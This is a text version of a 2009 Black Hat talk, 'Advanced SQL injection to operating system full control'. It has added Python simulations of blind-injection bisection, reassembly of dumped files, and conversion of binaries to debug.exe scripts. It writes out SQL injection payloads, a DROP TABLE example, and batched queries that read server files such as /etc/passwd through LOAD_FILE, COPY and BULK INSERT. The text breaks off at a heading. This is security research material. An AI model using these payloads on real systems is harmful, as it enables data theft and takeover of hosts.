Advanced SQL injection to operating system full control
Bernardo Damele Assumpção Guimarães

Black Hat Briefings Europe Amsterdam (NL) – April 16, 2009

Who I am
Bernardo Damele Assumpção Guimarães:
• Proud father
• IT security engineer
• sqlmap lead developer
• MySQL UDF repository developer


SQL injection definition
• SQL injection attacks are a type of injection attack in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL statements
• It is a common threat in web applications that lack proper sanitization of user-supplied input used in SQL queries

SQL injection techniques
• Boolean-based blind SQL injection:
par=1 AND ORD(MID((SQL query), Nth char, 1)) > Bisection num--

• UNION query (inband) SQL injection:
par=1 UNION ALL SELECT query--

• Batched queries SQL injection:
par=1; SQL query;--
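The boolean-based technique above is the slowest of the three, so it is worth seeing how it actually reconstructs a query result: one request per yes/no question, eight questions per byte when the code is bisected over 0..255, plus one final round that detects the end of the string (MID() past the end returns '' and ORD('') is 0). The following simulation is an added example, not code from the talk or from sqlmap; the vulnerable target is replaced by a class that only answers true/false, and the secret it holds is constructed sample data.

```python
"""Boolean-based blind extraction by bisection (added example)."""


def blind_payload(query: str, pos: int, num: int, param: str = "par", value: str = "1") -> str:
    """Build the slide's payload for one oracle question.

    The injected parameter name and value ('par', '1') are the slide's
    placeholders. Note the space after '--': MySQL only treats '-- ' as a
    comment when it is followed by whitespace.
    """
    return f"{param}={value} AND ORD(MID(({query}),{pos},1))>{num}-- "


class SimulatedTarget:
    """Stand-in for the vulnerable page: it answers only 'page unchanged'
    (True) or 'page differs' (False), as a blind injection point does.
    The secret is constructed sample data, not a real query result."""

    def __init__(self, secret: str):
        self._secret = secret
        self.requests = []  # every payload that would have been sent

    def is_true(self, payload: str, pos: int, num: int) -> bool:
        self.requests.append(payload)
        # MID() beyond the end of the string yields '', and ORD('') is 0.
        code = ord(self._secret[pos - 1]) if pos <= len(self._secret) else 0
        return code > num


def extract_char(target: SimulatedTarget, query: str, pos: int, lo: int = 0, hi: int = 255) -> int:
    """Bisect the character code at 1-based position pos within [lo, hi]."""
    while lo < hi:
        mid = (lo + hi) // 2
        if target.is_true(blind_payload(query, pos, mid), pos, mid):
            lo = mid + 1  # ORD(...) > mid
        else:
            hi = mid      # ORD(...) <= mid
    return lo


def extract_string(target: SimulatedTarget, query: str) -> str:
    """Extract the query result character by character until ORD() == 0."""
    out = []
    pos = 1
    while True:
        code = extract_char(target, query, pos)
        if code == 0:  # past the end of the result
            return "".join(out)
        out.append(chr(code))
        pos += 1


if __name__ == "__main__":
    target = SimulatedTarget("5.1.30-community")  # constructed sample
    result = extract_string(target, "SELECT VERSION()")
    print(result, "in", len(target.requests), "requests")
```

The request count is what makes the technique expensive: a 16-character value costs 8 * (16 + 1) = 136 requests. The 0..255 range assumes single-byte characters; MySQL's ORD() returns a larger code for multi-byte characters, so the bounds must be widened for non-ASCII data.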

How far can an attacker go by exploiting a SQL injection?


Scope of the analysis
• Three database management systems:
– MySQL on Windows
– PostgreSQL on Windows and Linux
– Microsoft SQL Server on Windows

• Three web application languages:
– ASP on Microsoft IIS, Windows
– ASP.NET on Microsoft IIS, Windows
– PHP on Apache and Microsoft IIS

Batched queries
• In SQL, batched queries are multiple SQL statements, separated by a semicolon, and passed to the database in a single request
• Example:
SELECT col FROM table1 WHERE id=1; DROP TABLE table2;

Batched queries support

(Table, not reproduced here: programming languages and their DBMS connectors' default support for batched queries)

File system read access


File read access on MySQL
• LOAD_FILE() function can be used to read either a text or a binary file
• Session user must have these privileges:
– FILE
– CREATE TABLE for the support table


File read access on MySQL
Via batched queries SQL injection technique:
SELECT HEX(LOAD_FILE('C:/example.exe')) INTO DUMPFILE 'C:/WINDOWS/Temp/hexkflwl';
CREATE TABLE footable(data longtext);
LOAD DATA INFILE 'C:/WINDOWS/Temp/hexkflwl' INTO TABLE footable FIELDS TERMINATED BY 'MFsIgeUPsa' (data);

File read access on MySQL
Via any SQL injection enumeration technique:
• Retrieve the length of the support table's field value
• Dump the support table's field value in chunks of 1024 characters

On the attacker box:
• Assemble the chunks into a single string
• Decode it from hex and write it to a local file

File read access on PostgreSQL
• COPY statement can be used to read a text file
– User-defined function can be used to read a binary file

• Session user must be a superuser to run this statement


File read access on PostgreSQL
Via batched queries SQL injection technique:
CREATE TABLE footable(data bytea);
COPY footable(data) FROM '/etc/passwd';


File read access on PostgreSQL
Via any SQL injection enumeration technique:
• Count the number of entries in the support table
• Dump the support table's field entries base64-encoded via the ENCODE() function

On the attacker box:
• Assemble the entries into a single string
• Decode it from base64 and write it to a local file
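The attacker-side half of both file-read procedures (the MySQL hex chunks above and the PostgreSQL base64 rows here) is the same shape: ask the support table how much there is, pull it piecewise through the injection point, and reassemble. The code below is an added example, not the talk's or sqlmap's code. The two support-table classes simulate what the batched payloads leave behind in footable; the query strings they accept (LENGTH/MID for MySQL, COUNT/ENCODE for PostgreSQL) are the straightforward readings of the slides, and the file content is constructed sample data.

```python
"""Reassembling a file dumped through a support table (added example)."""
import base64
import binascii

# Constructed sample content (not from the slides): passwd-style lines
# repeated so that the hex dump spans more than one 1024-character chunk.
SAMPLE_FILE = (
    b"root:x:0:0:root:/root:/bin/bash\n"
    b"daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    b"www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
) * 5

CHUNK = 1024  # characters per MID() call, as on the MySQL slide


class MySQLSupportTable:
    """Simulates footable after the batched LOAD_FILE() / INTO DUMPFILE /
    LOAD DATA INFILE payload: a single row whose `data` is HEX(file)."""

    def __init__(self, file_bytes: bytes):
        self.data = binascii.hexlify(file_bytes).decode().upper()
        self.queries = []  # what the injection point would have been asked

    def run(self, sql: str) -> str:
        self.queries.append(sql)
        if sql == "SELECT LENGTH(data) FROM footable":
            return str(len(self.data))
        # Expected shape: SELECT MID(data,<start>,<len>) FROM footable (1-based start)
        inner = sql[len("SELECT MID(data,"):sql.index(")")]
        start, length = (int(x) for x in inner.split(","))
        return self.data[start - 1:start - 1 + length]


def dump_mysql_file(db: MySQLSupportTable) -> bytes:
    """Length first, then fixed-size MID() chunks, then hex-decode."""
    total = int(db.run("SELECT LENGTH(data) FROM footable"))
    chunks = [db.run(f"SELECT MID(data,{start},{CHUNK}) FROM footable")
              for start in range(1, total + 1, CHUNK)]
    hexstr = "".join(chunks)
    if len(hexstr) != total:  # a lost or truncated chunk corrupts the whole file
        raise ValueError(f"dump incomplete: {len(hexstr)} of {total} hex characters")
    return binascii.unhexlify(hexstr)


class PostgreSQLSupportTable:
    """Simulates footable after COPY footable(data) FROM '/etc/passwd':
    COPY stores one row per input line, with the line terminator stripped."""

    def __init__(self, file_bytes: bytes):
        self.rows = file_bytes.split(b"\n")
        if self.rows[-1] == b"":
            self.rows.pop()

    def count(self) -> int:  # SELECT COUNT(*) FROM footable
        return len(self.rows)

    def encode_row(self, i: int) -> str:  # SELECT ENCODE(data,'base64') for row i
        # PostgreSQL's base64 encoder wraps its output every 76 characters.
        return base64.encodebytes(self.rows[i]).decode()


def dump_postgres_file(db: PostgreSQLSupportTable) -> bytes:
    """One row per line: decode each, then put the stripped newlines back."""
    # b64decode() discards the embedded line breaks by default.
    lines = [base64.b64decode(db.encode_row(i)) for i in range(db.count())]
    # Assumes a newline-terminated text file, which is what COPY consumed.
    return b"".join(line + b"\n" for line in lines)


if __name__ == "__main__":
    print(dump_mysql_file(MySQLSupportTable(SAMPLE_FILE)) == SAMPLE_FILE)
    print(dump_postgres_file(PostgreSQLSupportTable(SAMPLE_FILE)) == SAMPLE_FILE)
```

Two caveats a practitioner hits immediately. The PostgreSQL path reconstructs a text file line by line, so row order matters, and footable as created on the slide has no ordering column; a serial id column (my addition, not on the slide) makes the per-row dump deterministic. And because COPY in text format interprets backslash escapes and strips terminators, a binary file does not survive this route, which is why the slide defers binary reads to a user-defined function.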

File read access on MS SQL Server
• BULK INSERT statement can be abused to read either a text or a binary file and save its content in a table text field
• Session user must have these privileges:
– INSERT
– ADMINISTER BULK OPERATIONS
– CREATE TABLE

File read access on MS SQL Server
Via batched queries SQL injection technique:
CREATE TABLE footable(data text);
CREATE TABLE footablehex(id INT IDENTITY(1, 1) PRIMARY KEY, data VARCHAR(4096));
BULK INSERT footable FROM 'C:/example.exe' WITH (CODEPAGE='RAW', FIELDTERMINATOR='QLKvIDMIjD', ROWTERMINATOR='dqIgILsFoi');

File read access on MS SQL Server
[…] WHILE (@counter > filepath')

• Session user must have CONTROL SERVER privilege
• On the attacker box:
– Split the file in chunks of 64 KB
– Convert each chunk to its plain text debug script format
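The two attacker-box steps just listed, splitting the file and turning each piece into a debug.exe script, are what the following added example implements; it is not code from the talk or from sqlmap. It relies on the classic debug.exe script commands (n to name the output file, r cx to set the byte count, e to enter bytes at an address, w to write, q to quit). The chunk ceiling of 0x10000 - 0x100 bytes is my assumption about why the slide says 64 KB: debug.exe is a 16-bit tool that loads file data at offset 0x100 of a single segment. The output path and the sample data are constructed.

```python
"""Binary to debug.exe script conversion, chunked (added example)."""

# Assumption: debug.exe addresses file data from offset 0x100 within one
# 64 KiB segment, so one script can write at most 0x10000 - 0x100 bytes.
MAX_CHUNK = 0x10000 - 0x100   # 65280 bytes
BYTES_PER_LINE = 20           # bytes per 'e' (enter) command


def chunk_to_debug_script(chunk: bytes, out_name: str) -> str:
    """Produce a debug.exe script that writes `chunk` to `out_name`."""
    if not 0 < len(chunk) <= MAX_CHUNK:
        raise ValueError(f"chunk must be 1..{MAX_CHUNK} bytes")
    lines = [
        f"n {out_name}",      # name the file the 'w' command will write
        "r cx",               # set register CX = number of bytes to write
        f"{len(chunk):x}",    #   debug reads the new CX value from the next line
        "f 0100 ffff 00",     # zero the data area before entering bytes
    ]
    for off in range(0, len(chunk), BYTES_PER_LINE):
        hexbytes = " ".join(f"{b:02x}" for b in chunk[off:off + BYTES_PER_LINE])
        lines.append(f"e {0x100 + off:x} {hexbytes}")  # enter bytes at this address
    lines += ["w", "q"]       # write CX bytes starting at 0x100, then quit
    return "\r\n".join(lines) + "\r\n"


def split_into_debug_scripts(data: bytes, base_name: str):
    """Split `data` into <= MAX_CHUNK pieces; returns [(chunk_file_name, script), ...]."""
    return [
        (f"{base_name}.{i}",
         chunk_to_debug_script(data[off:off + MAX_CHUNK], f"{base_name}.{i}"))
        for i, off in enumerate(range(0, len(data), MAX_CHUNK))
    ]


def debug_script_to_bytes(script: str) -> bytes:
    """Re-read the 'e' lines of a script, to verify the conversion round-trips."""
    out = bytearray()
    for line in script.splitlines():
        if line.startswith("e "):
            _, addr, *hexbytes = line.split()
            if int(addr, 16) != 0x100 + len(out):
                raise ValueError(f"non-contiguous address {addr}")
            out += bytes(int(h, 16) for h in hexbytes)
    return bytes(out)


if __name__ == "__main__":
    sample = bytes(range(256)) * 300  # 76800 constructed bytes -> two chunks
    for name, script in split_into_debug_scripts(sample, r"C:\WINDOWS\Temp\chunk"):
        print(name, len(script.splitlines()), "script lines")
```

Each script stays plain ASCII, which is the point of the format: it can travel through a text-only channel such as an injected statement. The page as extracted here does not show how the scripts reach the target or how the written chunks are concatenated back into one file, so that part is not reproduced. A further caveat: debug.exe only ships on 32-bit Windows, so this route does not exist on a 64-bit database host.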

File write access on MS SQL...